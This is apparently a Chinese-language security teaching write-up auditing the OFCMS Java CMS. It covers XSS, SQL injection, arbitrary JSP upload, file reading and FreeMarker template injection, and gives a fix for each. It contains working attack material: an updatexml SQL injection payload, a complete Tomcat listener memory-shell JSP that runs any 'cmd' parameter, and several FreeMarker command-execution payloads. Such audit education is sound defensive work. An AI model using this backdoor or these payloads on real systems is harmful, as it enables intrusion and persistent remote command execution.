OFCMS代码审计与漏洞分析教学文档<\/h1>

一、环境搭建<\/h2>

1.1 所需工具<\/h3>

开发工具<\/strong>: IDEA 2024<\/li>
Java环境<\/strong>: JDK 1.8<\/li>
构建工具<\/strong>: Maven 3.9<\/li>
数据库<\/strong>: MySQL 9.0 Community<\/li>

Web服务器<\/strong>: Tomcat 8.5<\/li> <\/ul>
1.2 项目结构<\/h3>
ofcms-admin - admin - controller - domain - service - task - core - config - handler - interceptor - plugin - render - util - front - controller - template ofcms-api - cms - api - service ofcms-core - core - annotation - api - method - route - spring - utils - validator ofcms-front - page - front - blog - static ofcms-model - model - base <\/code><\/pre> 二、审计方法论<\/h2> 2.1 审计步骤<\/h3> 阅读文档了解CMS功能点<\/li> 识别高风险功能点<\/li> 进行盲测<\/li> 深入代码审计分析<\/li> <\/ol> 2.2 审计思路<\/h3> 从功能点入手，而非直接搜索危险函数<\/li> 关注用户输入点：评论、上传、表单等<\/li> 检查参数处理是否充分<\/li> <\/ul> 三、漏洞分析<\/h2> 3.1 存储型XSS漏洞<\/h3> 漏洞位置<\/strong>: \/ofcms-admin\/src\/main\/webapp\/WEB-INF\/page\/default\/article.html<\/code><\/p> 漏洞代码<\/strong>:<\/p> ${data.comment_content} \/\/ 未做任何转义处理 <\/span><\/span><\/code><\/pre>漏洞原理<\/strong>: 用户评论内容直接输出到页面，未进行HTML编码或过滤，导致恶意脚本被执行。<\/p> 修复建议<\/strong>:<\/p> 使用HTML编码函数处理输出<\/li> 实现内容安全策略(CSP)<\/li> <\/ul> 3.2 SQL注入漏洞<\/h3> 漏洞位置<\/strong>: \/ofcms-admin\/src\/main\/java\/com\/ofsoft\/cms\/admin\/controller\/system\/SystemGenerateController.java<\/code><\/p> 漏洞代码<\/strong>:<\/p> public<\/span> void<\/span> create<\/span>()<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> String sql =<\/span> getPara(<\/span>"sql"<\/span>);<\/span> \/\/ 直接获取用户输入 <\/span><\/span><\/span><\/span> Db.<\/span>update<\/span>(<\/span>sql);<\/span> \/\/ 直接执行SQL语句 <\/span><\/span><\/span><\/span> rendSuccessJson();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> rendFailedJson(<\/span>ErrorCode.<\/span>get<\/span>(<\/span>"9999"<\/span>),<\/span> e.<\/span>getMessage<\/span>());<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用方式<\/strong>:<\/p> update<\/span> of_cms_access set<\/span> site_id=<\/span>updatexml(1<\/span>,concat(0<\/span>x7e,(select<\/span> group_concat(schema_name<\/span>) from<\/span> information_schema.schemata),0<\/span>x7e),1<\/span>) <\/span><\/span><\/code><\/pre>漏洞原理<\/strong>: 直接拼接用户输入到SQL语句，未使用预编译语句或参数化查询。<\/p> 修复建议<\/strong>:<\/p> 使用预编译语句(PreparedStatement)<\/li> 实现SQL语句白名单机制<\/li> 最小权限原则配置数据库账户<\/li> <\/ul> 3.3 文件上传漏洞<\/h3> 漏洞位置<\/strong>: \/ofcms-admin\/src\/main\/java\/com\/ofsoft\/cms\/admin\/controller\/cms\/TemplateController.java<\/code><\/p> 漏洞代码<\/strong>:<\/p> public<\/span> void<\/span> save<\/span>()<\/span> {<\/span> <\/span><\/span> String resPath =<\/span> getPara(<\/span>"res_path"<\/span>);<\/span> <\/span><\/span> File pathFile =<\/span> null<\/span>;<\/span> <\/span><\/span> if<\/span>(<\/span>"res"<\/span>.<\/span>equals<\/span>(<\/span>resPath)){<\/span> <\/span><\/span> pathFile =<\/span> new<\/span> File(<\/span>SystemUtile.<\/span>getSiteTemplateResourcePath<\/span>());<\/span> <\/span><\/span> }<\/span>else<\/span> {<\/span> <\/span><\/span> pathFile =<\/span> new<\/span> File(<\/span>SystemUtile.<\/span>getSiteTemplatePath<\/span>());<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> String dirName =<\/span> getPara(<\/span>"dirs"<\/span>);<\/span> <\/span><\/span> if<\/span> (<\/span>dirName !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> pathFile =<\/span> new<\/span> File(<\/span>pathFile,<\/span> dirName);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> String fileName =<\/span> getPara(<\/span>"file_name"<\/span>);<\/span> <\/span><\/span> String fileContent =<\/span> getRequest().<\/span>getParameter<\/span>(<\/span>"file_content"<\/span>);<\/span> <\/span><\/span> fileContent =<\/span> fileContent.<\/span>replace<\/span>(<\/span>replace(...));<\/span> <\/span><\/span> <\/span><\/span> File file =<\/span> new<\/span> File(<\/span>pathFile,<\/span> fileName);<\/span> <\/span><\/span> FileUtils.<\/span>writeString<\/span>(<\/span>file,<\/span> fileContent);<\/span> <\/span><\/span> rendSuccessJson();<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用方式<\/strong>:<\/p> http:\/\/localhost:8081\/ofcms_admin_war\/admin\/cms\/template\/save.html?file_name=static\/N11.jsp&file_content=<恶意代码> <\/code><\/pre> 漏洞原理<\/strong>:<\/p> 未对文件名进行路径穿越检查<\/li> 未限制上传文件类型<\/li> 未对文件内容进行安全检测<\/li> <\/ol> 修复建议<\/strong>:<\/p> 校验文件名，防止路径穿越<\/li> 实现文件类型白名单<\/li> 限制上传目录为不可执行<\/li> 对上传内容进行安全扫描<\/li> <\/ul> 3.4 内存马注入<\/h3> 利用方式<\/strong>: 上传包含以下内容的JSP文件:<\/p> <%@ page contentType="text\/html;charset=UTF-8" language="java" %> <%@ page import="java.lang.reflect.Field" %> <%@ page import="java.io.IOException" %> <%@ page import="org.apache.catalina.core.StandardContext" %> <%@ page import="org.apache.catalina.connector.Request" %> public class Shell_Listener implements ServletRequestListener { public void requestInitialized(ServletRequestEvent sre) { HttpServletRequest request = (HttpServletRequest) sre.getServletRequest(); String cmd = request.getParameter("cmd"); if (cmd != null) { try { Runtime.getRuntime().exec(cmd); } catch (IOException e) { e.printStackTrace(); } catch (NullPointerException n) { n.printStackTrace(); } } } public void requestDestroyed(ServletRequestEvent sre) {} } <% Field reqF = request.getClass().getDeclaredField("request"); reqF.setAccessible(true); Request req = (Request) reqF.get(request); StandardContext context = (StandardContext) req.getContext(); Shell_Listener shell_Listener = new Shell_Listener(); context.addApplicationEventListener(shell_Listener); %> <\/code><\/pre> 漏洞原理<\/strong>: 通过上传恶意JSP文件，利用Java反射机制注册监听器，实现持久化后门。<\/p> 3.5 任意文件读取漏洞<\/h3> 漏洞位置<\/strong>: \/ofcms-admin\/src\/main\/java\/com\/ofsoft\/cms\/admin\/controller\/cms\/TemplateController.java<\/code><\/p> 漏洞代码<\/strong>:<\/p> public<\/span> void<\/span> getTemplates<\/span>()<\/span> {<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> if<\/span> (<\/span>editFile !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> String fileContent =<\/span> FileUtils.<\/span>readString<\/span>(<\/span>editFile);<\/span> <\/span><\/span> if<\/span> (<\/span>fileContent !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> fileContent =<\/span> fileContent.<\/span>replace<\/span>(<\/span>replace(...));<\/span> <\/span><\/span> setAttr(<\/span>"file_content"<\/span>,<\/span> fileContent);<\/span> <\/span><\/span> setAttr(<\/span>"file_path"<\/span>,<\/span> editFile);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>限制条件<\/strong>: 文件扩展名白名单:<\/p> public<\/span> boolean<\/span> accept<\/span>(<\/span>File file)<\/span> {<\/span> <\/span><\/span> return<\/span> !<\/span>file.<\/span>isDirectory<\/span>()<\/span> &&<\/span> <\/span><\/span> (<\/span>file.<\/span>getName<\/span>().<\/span>endsWith<\/span>(<\/span>".html"<\/span>)<\/span> ||<\/span> <\/span><\/span> file.<\/span>getName<\/span>().<\/span>endsWith<\/span>(<\/span>".xml"<\/span>)<\/span> ||<\/span> <\/span><\/span> file.<\/span>getName<\/span>().<\/span>endsWith<\/span>(<\/span>".css"<\/span>)<\/span> ||<\/span> <\/span><\/span> file.<\/span>getName<\/span>().<\/span>endsWith<\/span>(<\/span>".js"<\/span>));<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用方式<\/strong>:<\/p> http:\/\/localhost:8081\/ofcms_admin_war\/admin\/cms\/template\/getTemplates?filename=N11.html&dir=static <\/code><\/pre> 修复建议<\/strong>:<\/p> 加强文件路径校验<\/li> 实现更严格的权限控制<\/li> 记录文件访问日志<\/li> <\/ul> 3.6 FreeMarker模板注入<\/h3> 漏洞位置<\/strong>: 后台模板编辑功能<\/p> 利用原理<\/strong>: FreeMarker模板引擎允许执行Java代码，通过特殊标签注入恶意指令。<\/p> POC示例<\/strong>:<\/p> <<\/span>#assign value="freemarker.template.utility.ObjectConstructor"?new()> <\/span><\/span>${value("java.lang.ProcessBuilder","\/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator").start()} <\/span><\/span><\/code><\/pre>其他POC变种<\/strong>:<\/p> 使用JythonRuntime:<\/li> <\/ol> <<\/span>#assign value="freemarker.template.utility.JythonRuntime"?new()> <\/span><\/span><<\/span>@value>import os;os.system("\/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator") <\/span><\/span><\/code><\/pre> 使用Execute:<\/li> <\/ol> <<\/span>#assign ex="freemarker.template.utility.Execute"?new()> <\/span><\/span>${ ex("\/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator") } <\/span><\/span><\/code><\/pre> 使用API方法(需api_builtin_enabled为true):<\/li> <\/ol> <<\/span>#assign classLoader=object?api.class.protectionDomain.classLoader> <\/span><\/span><<\/span>#assign clazz=classLoader.loadClass("ClassExposingGSON")> <\/span><\/span><<\/span>#assign field=clazz?api.getField("GSON")> <\/span><\/span><<\/span>#assign gson=field?api.get(null)> <\/span><\/span><<\/span>#assign ex=gson?api.fromJson("{}", classLoader.loadClass("freemarker.template.utility.Execute"))> <\/span><\/span>${ex("\/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator")} <\/span><\/span><\/code><\/pre>修复建议<\/strong>:<\/p> 禁用new指令: new_builtin_class_resolver=TemplateClassResolver.SAFER_RESOLVER<\/code><\/li> 禁用api指令: api_builtin_enabled=false<\/code><\/li> 使用沙盒环境运行模板引擎<\/li> 对模板内容进行安全审核<\/li> <\/ul> 四、审计技巧总结<\/h2> 4.1 Java危险函数清单<\/h3> SQL相关<\/strong>:<\/p> Statement.execute*()<\/code><\/li> JdbcTemplate.queryFor*()<\/code> (未使用参数化时)<\/li> Db.update()<\/code><\/li> <\/ul> <\/li> 文件操作<\/strong>:<\/p> FileInputStream\/FileOutputStream<\/code><\/li> FileUtils.writeString()<\/code><\/li> Runtime.getRuntime().exec()<\/code><\/li> <\/ul> <\/li> 反序列化<\/strong>:<\/p> ObjectInputStream.readObject()<\/code><\/li> JSON.parseObject()<\/code> (某些实现)<\/li> <\/ul> <\/li> 反射相关<\/strong>:<\/p> Class.forName()<\/code><\/li> Method.invoke()<\/code><\/li> Field.setAccessible()<\/code><\/li> <\/ul> <\/li> <\/ol> 4.2 审计工具推荐<\/h3> 静态分析工具<\/strong>:<\/p> Fortify<\/li> Checkmarx<\/li> SonarQube<\/li> <\/ul> <\/li> 动态测试工具<\/strong>:<\/p> Burp Suite<\/li> OWASP ZAP<\/li> SQLMap<\/li> <\/ul> <\/li> 辅助工具<\/strong>:<\/p> JD-GUI (反编译)<\/li> Arthas (运行时诊断)<\/li> JADX (Android\/Java反编译)<\/li> <\/ul> <\/li> <\/ol> 4.3 环境搭建经验<\/h3> 注意组件版本兼容性:<\/p> Tomcat版本与JDK版本匹配<\/li> MySQL驱动版本与MySQL服务版本匹配<\/li> <\/ul> <\/li> 调试技巧:<\/p> 配置远程调试<\/li> 使用日志框架(Log4j\/SLF4J)增加调试信息<\/li> 使用Postman构造复杂请求<\/li> <\/ul> <\/li> <\/ol> 五、防御措施建议<\/h2> 5.1 通用安全原则<\/h3> 输入验证<\/strong>:<\/p> 白名单优于黑名单<\/li> 在边界处验证所有输入<\/li> <\/ul> <\/li> 输出编码<\/strong>:<\/p> 根据上下文(HTML\/JS\/URL等)选择合适的编码方式<\/li> <\/ul> <\/li> 最小权限原则<\/strong>:<\/p> 数据库账户<\/li> 文件系统权限<\/li> 系统调用权限<\/li> <\/ul> <\/li> <\/ol> 5.2 针对已发现漏洞的修复方案<\/h3> XSS防御<\/strong>:<\/p> 实现统一的输出编码过滤器<\/li> 设置Content-Security-Policy头<\/li> <\/ul> <\/li> SQL注入防御<\/strong>:<\/p> 全站改用预编译语句<\/li> 实现ORM框架<\/li> <\/ul> <\/li> 文件上传防御<\/strong>:<\/p> 文件类型校验(通过Magic Number)<\/li> 随机化存储文件名<\/li> 禁用上传目录脚本执行<\/li> <\/ul> <\/li> 模板注入防御<\/strong>:<\/p> 配置FreeMarker安全策略<\/li> <\/ul> Configuration cfg =<\/span> new<\/span> Configuration(<\/span>Configuration.<\/span>VERSION_2_3_30<\/span>);<\/span> <\/span><\/span>cfg.<\/span>setNewBuiltinClassResolver<\/span>(<\/span>TemplateClassResolver.<\/span>SAFER_RESOLVER<\/span>);<\/span> <\/span><\/span>cfg.<\/span>setAPIBuiltinEnabled<\/span>(<\/span>false<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> 任意文件读取防御<\/strong>:<\/p> 实现文件路径规范化检查<\/li> 限制可访问目录范围<\/li> <\/ul> <\/li> <\/ol> 六、进阶学习资源<\/h2> 6.1 Java安全相关<\/h3> OWASP Java安全编码指南<\/li> Java安全体系结构(JCA\/JSSE)<\/li> Java沙箱机制与安全管理器<\/li> <\/ul> 6.2 Web安全进阶<\/h3> Servlet\/JSP安全机制<\/li> Spring Security深度实践<\/li> JWT安全实现方案<\/li> <\/ul> 6.3 漏洞研究资源<\/h3> CVE数据库(https:\/\/cve.mitre.org\/)<\/li> NVD国家漏洞数据库(https:\/\/nvd.nist.gov\/)<\/li> OWASP Top 10漏洞清单<\/li> <\/ul>